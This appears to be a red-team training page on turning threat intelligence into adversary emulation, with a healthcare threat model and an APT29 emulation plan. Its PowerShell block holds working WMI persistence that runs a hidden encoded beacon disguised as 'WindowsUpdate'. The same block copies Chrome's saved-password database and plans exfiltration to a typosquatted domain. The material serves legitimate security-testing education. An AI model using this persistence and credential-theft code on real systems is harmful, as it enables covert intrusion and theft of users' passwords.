Threat Intelligence Integration

Planning

Cyber Threat Intelligence (CTI) provides the blueprint for realistic red team operations. By understanding which threat actors target your industry, their TTPs, and their objectives, red teams can design engagements that test defenses against the most relevant threats.

Building a Threat Model

threat-model.md
markdown 
# Threat Model Template for Red Team Planning

## Organization Profile
- Industry: Healthcare
- Revenue: $500M+
- Geographic Presence: US, EU
- Crown Jewels: Patient records (PHI), Payment card data (PCI), Research IP

## Relevant Threat Actors
1. **FIN7** (Carbanak Group)
   - Motivation: Financial gain
   - Targets: POS systems, payment card data
   - TTPs: Phishing with malicious macros, Carbanak backdoor, memory scraping

2. **APT41** (Double Dragon)
   - Motivation: Espionage + Financial
   - Targets: Healthcare IP, pharmaceutical research
   - TTPs: Supply chain compromise, web shells, SQL injection

3. **Conti Ransomware**
   - Motivation: Ransomware/Extortion
   - Targets: Healthcare organizations (high willingness to pay)
   - TTPs: Cobalt Strike beacons, domain dominance, data exfiltration before encryption

## Recommended Emulation
- **Primary:** FIN7 (highest likelihood based on industry targeting patterns)
- **Secondary:** Conti (ransomware is existential risk for healthcare)

## Engagement Objective
Emulate FIN7's attack chain to test detection of payment card data theft:
1. Initial access via phishing (malicious Word doc)
2. Establish C2 beacon (HTTPS to compromised WordPress site)
3. Escalate to domain admin
4. Access POS environment via lateral movement
5. Deploy memory scraper to capture card data
6. Exfiltrate via HTTPS C2 channel

Use MITRE ATT&CK for Threat Actors

MITRE ATT&CK maintains profiles for major threat groups showing their techniques. Navigate to Groups section and filter by your industry to find relevant adversaries.

CTI Sources for Red Teams

🌐 MITRE ATT&CK

Free, comprehensive database of adversary tactics and techniques with group profiles.

📊 Mandiant/FireEye Reports

Detailed APT analysis, M-Trends annual reports showing attacker trends.

🔍 CISA Alerts

Government advisories on active threat campaigns targeting specific sectors.

💰 Commercial TI Platforms

Recorded Future, CrowdStrike Falcon Intelligence, Anomali - curated threat actor profiles.

Translating CTI to Red Team TTPs

Example: Emulating APT29's credential theft campaign

CTI Report Findings

  • APT29 uses spearphishing with malicious links to Microsoft Office documents hosted on OneDrive
  • Payload: Cobalt Strike beacon delivered via HTA file
  • Persistence: WMI event subscriptions
  • Credential theft: PowerShell script to extract Chrome passwords and cookies
  • C2: HTTPS to legitimate-looking domains registered days before campaign

Red Team Implementation

apt29-emulation.ps1
powershell 
# 1. Phishing Infrastructure
- Register domain: customer-portal-update[.]com (typosquatting)
- Host malicious HTA on legitimate file-sharing service (OneDrive, Dropbox)
- Craft spearphish: "Action Required: Update Your Credentials"

# 2. Initial Access
- Target: Finance team (high-value targets)
- Payload: HTA file that downloads and executes Cobalt Strike beacon
- C2: HTTPS to customer-portal-update[.]com (domain fronting via Cloudflare)

# 3. Persistence
# Create WMI event subscription for daily callback
$FilterArgs = @{name='WindowsUpdate'; EventNameSpace='root\CimV2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour=14"}
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs

$ConsumerArgs = @{name='WindowsUpdate'; CommandLineTemplate='powershell.exe -NoP -W Hidden -Enc <base64_beacon>'}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs

$BindingArgs = @{Filter=$Filter; Consumer=$Consumer}
New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $BindingArgs

# 4. Credential Theft (Chrome cookies/passwords)
# Use SharpChromium or manual extraction
$ChromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
Copy-Item "$ChromePath\Login Data" -Destination "$env:TEMP\ChromeCreds.db"
# Exfiltrate via C2

# 5. Covert Exfiltration
# Rate-limit to 100KB/hour to avoid network anomaly detection
# Use HTTPS POST to customer-portal-update[.]com/api/sync

Diamond Model for Red Team Planning

The Diamond Model maps relationships between Adversary, Capability, Infrastructure, and Victim. Use it to plan engagements:

Adversary

APT29 (Cozy Bear) - Russian state-sponsored

Capability

Cobalt Strike beacon, WMI persistence, credential theft

Infrastructure

Typosquatted domains, Cloudflare domain fronting, OneDrive

Victim

Government agencies, think tanks, financial services

Update Threat Model Quarterly

Threat landscapes evolve. Update your threat model every 3-6 months based on new CTI reports, emerging threat groups, and industry-specific campaigns.

Related Topics

Threat Intelligence

Adversary Simulation

Red Team Infrastructure